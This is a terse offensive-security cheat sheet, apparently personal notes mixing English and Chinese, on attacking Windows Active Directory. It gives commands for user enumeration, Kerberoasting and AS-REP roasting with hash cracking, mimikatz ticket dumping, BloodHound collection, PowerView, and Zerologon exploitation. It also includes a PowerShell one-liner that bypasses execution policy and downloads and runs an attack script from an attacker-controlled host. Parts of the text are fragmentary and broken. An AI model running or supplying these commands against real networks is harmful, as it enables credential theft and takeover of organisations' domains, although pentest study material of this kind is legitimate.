- List user
net user
Machinenet user /domain
ADnet user {Username} /domain
list user detail
- List group
net group
net group /domain
- Get User Hash
- nidem/kerberoast
- Invoke-Kerberoast.ps1
PS > Import-Module .\Invoke-Kerberoast.ps1 PS > Invoke-Kerberoast -OutputFormat Hashcat
- 然後拿去用 hashcat 爆
- 或一氣呵成的
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://{MY_IP}/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
hashcat -m 13100
- 或是 mimikatz 的
kerberos::list /export
可以把 ticket dump 出來,然後python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt <ticket filename>
- GetUserSPNs
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
setspn –q */*
- ref
- BloodHound
- 挖 AD 中的關係
- Use SharpHound to collect data on target machine
./SharpHound.exe --collectionmethods All
- Run bloodhound server
- 先啟動 neo4j
sudo neo4j console
- 第一次需要設帳密
- 跑 bloodhound
- Upload Data
- 上傳用 SharHound 拿到的東西
- 先啟動 neo4j
nmap -n -sV -p389 --script "ldap* and not brute"
ldapsearch -x -H LDAP:// -s base namingcontexts
ldapsearch -H LDAP:// -x -b "DC=cascade,DC=local"
- 如果有使用者在登入狀態,可以從 memory 中偷帳密
- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName <computer>
- ref
- 若 user 沒有 DONT_REQ_PREAUTH 任何能都能傳 AS_REQ 給 DC
- rpcclient
rpcclient -U "<user (can be empty)>" <ip>
- Enumerating Domain Users
impacket-GetNPUsers <domain>/ -usersfile ./username.txt -dc-ip <dc-ip>
- ref
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
Foreach($prop in $obj.Properties)
Write-Host "------------------------"
必要時可以加 fillter $Searcher.filter="name=Jeff_Admin"
- Tester
- https://github.com/SecuraBV/CVE-2020-1472
- Check if zerologon enable
- Exploit
- zerologon cve-2020-1472
- https://github.com/dirkjanm/CVE-2020-1472
- Account password will become empty if success
- Use secretdump (
) get hash - Reinstall password
- Get-PassHashes.ps1
- https://github.com/turbo/zero2hero
- Akagi.zip
- 空 LM :
- 空 LM :
- [Kerbrute](https://github.com/ropnop/kerbrute/releases
- adPEAS
- Kerberos 驗證過程